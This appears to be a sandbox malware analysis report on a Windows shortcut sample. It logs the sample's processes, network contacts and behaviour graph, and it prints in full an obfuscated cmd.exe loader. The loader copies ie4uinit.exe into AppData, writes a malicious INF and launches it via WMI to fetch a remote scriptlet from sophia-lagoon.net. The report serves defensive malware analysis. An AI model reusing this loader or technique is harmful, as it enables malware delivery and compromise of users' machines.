Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: ie4uinit.exe, 00000013.00000003.1580755717.000002474BFD0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: ie4uinit.exe, 00000013.00000003.1580755717.000002474BFD0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-USn
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /v /c set "lucky50=e" && set "lucky5=$w" && set "lucky03=version" && set "lucky10=d" && (for %u in (a) do @set "lucky87=%~u") && set "lucky41=fast" && call set "lucky59=%lucky41:~2,1%" && set "lucky85=init" && set "lucky7=t" && set "lucky26=." && set "lucky23=settings" && set "lucky55=si" && (for %q in (c) do @set "lucky29=%~q") && set "lucky65=!lucky26!inf" && set "lucky15=ieu!lucky85!!lucky65!" && call !lucky59!et "lucky11=%app!lucky10!ata%\micro!lucky59!oft\" && !lucky59!et "lucky8=!lucky11!!lucky15!" && (for %p in ("[!lucky03!]" "signature = !lucky5!indows nt$" "[!lucky10!e!lucky59!tinationdirs]" "e4139c=01" "[!lucky10!efaultin!lucky59!tall.windows7]" "unregis!lucky7!erocxs=a687d4" "!lucky10!elfil!lucky50!s=e4139c" "[a687d4]" "%11%\scro\" "%lucky51%j,ni,%lucky21%%lucky0%%lucky0%p%lucky1%%lucky9%%lucky9%sophia-lagoon!lucky26!%lucky56%/81754783" "[e4139c]" "ieu%lucky69%!lucky65!" "[!lucky59!!lucky7!rings]" "lucky69=!lucky85!" "lucky0=t;lucky40" "!lucky59!ervicen!lucky87!me=' '" "lucky21=h" "lucky1=:;lucky35" "lucky9=/" "!lucky59!hortsvcn!lucky87!me=' '" "lucky56=net" "lucky51=b;lucky67" "lucky25=%time%") do @e!lucky29!ho %~p)>"!lucky8!" && !lucky59!et "lucky2=ie4u!lucky85!.!lucky50!xe" && call xcopy /y /c /q %win!lucky10!ir%\!lucky59!ystem32\!lucky2! "!lucky11!*" | set lucky93=nation && !lucky59!t!lucky87!rt "" wmi!lucky29! proce!lucky59!s call !lucky29!rea!lucky7!e "!lucky11!!lucky2! -base!lucky23!" | set lucky28= occur elevator knock considerations teens stool rankings offices message toward reviews discusses appliances tasks scorpion situations erase shock clean vault carriers twins disease dentists seeks friends impulse vehicles stand submissions night batteries cigar junior heart habit containers cables taxes ostrich series incentives sorts erode measurements investigators styles music actress items differ suits sources archives headphones texas emotions monsters above holdings outputs characteristics forecasts readers processes plastic mosquito roses manuals representatives editors elephant recommendations roommates coral dolphin offers focuses implies ignore champions family rangers garlic blind evidence facilities products makers wives pockets solaris vibrant excess raven secrets celebs summaries inherit crawl tutorials stands upgrade crowd betray orange patient entire weather cruel wellness attention waters failures jewel buttons assume configurations levels enemy labels memories ticket honey violin primary lovers depends exceptions findings olympics cousin kinds fruits centres smart avoid mechanic gorilla swingers century figure details renew careers embody shapes antibodies motion interactions instances miles subway remain legend mounts midnight mercy filter sessions asthma shrimp greetings autumn
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set lucky28= occur elevator knock considerations teens stool rankings offices message toward reviews discusses appliances tasks scorpion situations erase shock clean vault carriers twins disease dentists seeks friends impulse vehicles stand submissions night batteries cigar junior heart habit containers cables taxes ostrich series incentives sorts erode measurements investigators styles music actress items differ suits sources archives headphones texas emotions monsters above holdings outputs characteristics forecasts readers processes plastic mosquito roses manuals representatives editors elephant recommendations roommates coral dolphin offers focuses implies ignore champions family rangers garlic blind evidence facilities products makers wives pockets solaris vibrant excess raven secrets celebs summaries inherit crawl tutorials stands upgrade crowd betray orange patient entire weather cruel wellness attention waters failures jewel buttons assume configurations levels enemy labels memories ticket honey violin primary lovers depends exceptions findings olympics cousin kinds fruits centres smart avoid mechanic gorilla swingers century figure details renew careers embody shapes antibodies motion interactions instances miles subway remain legend mounts midnight mercy filter sessions asthma shrimp greetings autumn"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set lucky28= occur elevator knock considerations teens stool rankings offices message toward reviews discusses appliances tasks scorpion situations erase shock clean vault carriers twins disease dentists seeks friends impulse vehicles stand submissions night batteries cigar junior heart habit containers cables taxes ostrich series incentives sorts erode measurements investigators styles music actress items differ suits sources archives headphones texas emotions monsters above holdings outputs characteristics forecasts readers processes plastic mosquito roses manuals representatives editors elephant recommendations roommates coral dolphin offers focuses implies ignore champions family rangers garlic blind evidence facilities products makers wives pockets solaris vibrant excess raven secrets celebs summaries inherit crawl tutorials stands upgrade crowd betray orange patient entire weather cruel wellness attention waters failures jewel buttons assume configurations levels enemy labels memories ticket honey violin primary lovers depends exceptions findings olympics cousin kinds fruits centres smart avoid mechanic gorilla swingers century figure details renew careers embody shapes antibodies motion interactions instances miles subway remain legend mounts midnight mercy filter sessions asthma shrimp greetings autumn" Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky93=Nation " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 16737 Sample: Education and Experience.ln... Startdate: 15/02/2023 Architecture: WINDOWS Score: 52 41 Very long command line found 2->41 43 Contains functionality to create processes via WMI 2->43 8 cmd.exe 2 2->8         started        10 ie4uinit.exe 64 2->10         started        13 ie4uinit.exe 2->13         started        15 2 other processes 2->15 process3 dnsIp4 17 cmd.exe 1 8->17         started        19 cmd.exe 1 8->19         started        21 conhost.exe 1 8->21         started        25 2 other processes 8->25 39 sophia-lagoon.net 142.11.222.59, 49727, 80 HOSTWINDSUS United States 10->39 23 ie4uinit.exe 46 10->23         started        process5 process6 27 WMIC.exe 1 17->27         started        30 xcopy.exe 2 19->30         started        33 rundll32.exe 23->33         started        file7 45 Creates processes via WMI 27->45 35 conhost.exe 27->35         started        37 C:\Users\user\AppData\...\ie4uinit.exe, PE32+ 30->37 dropped signatures8 process9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.11.222.59
 sophia-lagoon.net United States
54290 HOSTWINDSUS false

Contacted Domains

Name IP Active
sophia-lagoon.net 142.11.222.59 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://sophia-lagoon.net/81754783 false
  • Avira URL Cloud: safe
 unknown